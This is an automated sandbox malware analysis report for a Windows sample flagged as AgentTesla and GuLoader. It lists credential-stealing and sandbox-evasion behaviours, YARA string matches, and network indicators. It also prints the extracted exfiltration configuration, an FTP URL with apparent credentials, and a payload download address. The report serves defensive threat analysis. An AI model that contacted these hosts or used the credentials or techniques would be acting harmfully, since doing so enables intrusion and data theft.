Edit tour

Windows Analysis Report
6culQoI97a.exe

Overview

General Information

Sample Name:	6culQoI97a.exe
Analysis ID:	755473
MD5:	d9aa122b8c39444799e60eabbab69502
SHA1:	0175baf7a240c2050571a6df273a892e8b192d81
SHA256:	317b5db72d7c43ab63caffa88412395a1b010d24f234eb1b7eeabc92105db143
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Antivirus detection for URL or domain

Yara detected GuLoader

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

6culQoI97a.exe (PID: 9084 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: D9AA122B8C39444799E60EABBAB69502)

CasPol.exe (PID: 2424 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 2776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000000.972511906.0000000000FB0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000002.00000002.1204047985.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30f14:$s10: logins 0x46998:$s10: logins 0x4fe48:$s11: credential 0x1e1e:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time 0x2346:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B 0x2892:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
Process Memory Space: CasPol.exe PID: 2424	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 2424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 2424	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x27298:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time 0x29415:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time 0x277c0:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B 0x2993c:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B 0x27d0c:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401 0x29e88:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
Click to see the 3 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 6culQoI97a.exe	ReversingLabs: Detection: 73%
Source: 6culQoI97a.exe	Virustotal: Detection: 56%			Perma Link

Antivirus detection for URL or domain

Source: ftp://ftp.gettoner.com.mx/droid	Avira URL Cloud: Label: malware
Source: http://195.178.120.24/mhpgXW188.chm	Avira URL Cloud: Label: malware

Source: 6culQoI97a.exe.9084.2.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}

Source: 6culQoI97a.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 6culQoI97a.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\6culQoI97a.exe	Code function: 2_2_00406448 FindFirstFileA,FindClose,	2_2_00406448
Source: C:\Users\user\Desktop\6culQoI97a.exe	Code function: 2_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	2_2_0040589C
Source: C:\Users\user\Desktop\6culQoI97a.exe	Code function: 2_2_004027A1 FindFirstFileA,	2_2_004027A1

Source: Joe Sandbox View

IP Address: 195.178.120.24 195.178.120.24

Source: global traffic

HTTP traffic detected: GET /mhpgXW188.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.178.120.24Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24
Source: unknown	TCP traffic detected without corresponding DNS query: 195.178.120.24

Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ftp://ftp.gettoner.com.mx/droid
Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000009.00000002.5786454694.0000000001396000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://195.178.120.24/mhpgXW188.chm
Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://NwSpLV.com
Source: 6culQoI97a.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 6culQoI97a.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: global traffic

HTTP traffic detected: GET /mhpgXW188.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.178.120.24Cache-Control: no-cache

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
6culQoI97a.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6culQoI97a.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Windows Analysis Report
6culQoI97a.exe